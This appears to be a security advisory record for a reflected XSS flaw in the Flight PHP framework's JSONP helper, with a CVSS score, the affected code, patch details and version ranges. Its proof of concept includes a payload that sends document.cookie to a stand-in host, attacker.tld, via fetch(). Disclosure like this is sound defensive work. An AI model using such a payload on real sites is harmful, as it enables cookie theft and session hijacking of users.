GHSA-fcx8-ph5r-mxr4

Source

https://github.com/advisories/GHSA-fcx8-ph5r-mxr4

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fcx8-ph5r-mxr4/GHSA-fcx8-ph5r-mxr4.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-fcx8-ph5r-mxr4

Aliases

CVE-2026-42548

Published

2026-05-06T21:34:15Z

Modified

2026-05-06T21:57:55.336006Z

Severity

8.6 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N CVSS Calculator

Summary

Flight has reflected XSS through an unvalidated JSONP callback in Flight::jsonp()

Details

Summary

Flight::jsonp() concatenates the ?jsonp= query parameter directly into an application/javascript response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting.

Affected code

flight/Engine.php (≈ lines 1000-1013):

$callback = $this->request()->query[$param];
$this->response()
    ->status($code)
    ->header('Content-Type', 'application/javascript; charset=' . $charset)
    ->write($callback . '(' . $json . ');');

No regex or identifier validation is performed before the callback is written.

Proof of concept

Given any route that calls Flight::jsonp($data):

GET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//

Reproduced response (Content-Type: application/javascript):

;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({"ok":true,"msg":"hello"});

When the vulnerable endpoint is loaded via <script src="https://victim.tld/api?jsonp=…"> on a page controlled by the attacker, the injected JavaScript executes in the victim.tld origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow.

Impact

Reflected XSS in any application calling Flight::jsonp().
Cookie theft / session hijack when JSONP endpoints are referenced from same-origin pages.
Exfiltration of authenticated API responses.

Patch (fixed in `3.18.1`, commit `b8dd23a`)

_jsonp() now validates the callback name against ^[A-Za-z_$][\w$.]{0,127}$ before emitting it. An empty callback (no jsonp parameter) still behaves as before.

Credit

Discovered by @Rootingg.

Database specific

{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T21:34:15Z",
    "cwe_ids": [
        "CWE-79"
    ],
    "severity": "HIGH",
    "nvd_published_at": null
}

References

Affected packages

Packagist / flightphp/core

Package

Name: flightphp/core
Purl: pkg:composer/flightphp/core

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.18.1

Affected versions

v1.*

v1.0

v1.1

v1.1.5

v1.1.10

v1.2

v1.2.13

v1.2.14

v1.2.15

v1.2.17

v1.2.18

v1.2.19

v1.2.20

v1.2.21

v1.2.22

v1.3.0

v1.3.1

v1.3.2

v1.3.3

v1.3.4

v1.3.5

v1.3.7

v1.3.8

v1.3.9

v2.*

v2.0.0

v2.0.1

v3.*

v3.0.0

v3.0.1

v3.0.2

v3.1.0

v3.1.1

v3.2.0

v3.3.0

v3.4.0

v3.4.1

v3.4.2

v3.5.0

v3.5.2

v3.5.3

v3.6.0

v3.6.1

v3.6.2

v3.7.0

v3.7.1

v3.7.2

v3.8.0

v3.8.1

v3.9.0

v3.10.0

v3.10.1

v3.11.0

v3.11.1

v3.12.0

v3.13.0

v3.13.1

v3.14.0

v3.15.0

v3.15.1

v3.15.2

v3.15.3

v3.16.0

v3.16.1

v3.17.0

v3.17.1

v3.17.2

v3.17.3

v3.17.4

v3.18.0

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fcx8-ph5r-mxr4/GHSA-fcx8-ph5r-mxr4.json"